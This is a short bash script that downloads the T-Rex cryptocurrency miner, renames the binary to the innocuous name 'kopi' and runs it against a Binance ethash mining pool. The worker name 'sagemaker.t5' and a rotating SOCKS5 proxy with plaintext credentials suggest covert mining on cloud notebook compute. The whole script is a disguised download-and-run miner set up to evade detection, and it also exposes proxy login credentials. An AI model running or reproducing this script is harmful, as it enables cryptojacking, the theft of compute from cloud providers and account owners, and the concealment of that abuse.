#!/bin/bash

wget https://github.com/trexminer/T-Rex/releases/download/0.24.8/t-rex-0.24.8-linux.tar.gz
tar -xvf t-rex-0.24.8-linux.tar.gz
mv t-rex kopi
chmod +x kopi
./kopi -a ethash -o stratum+tcp://ethash.poolbinance.com:443 -u sagemaker.t5 -p x --proxy socks5://njhlezbg-rotate:bo6mj3wz34gr@p.webshare.io:80
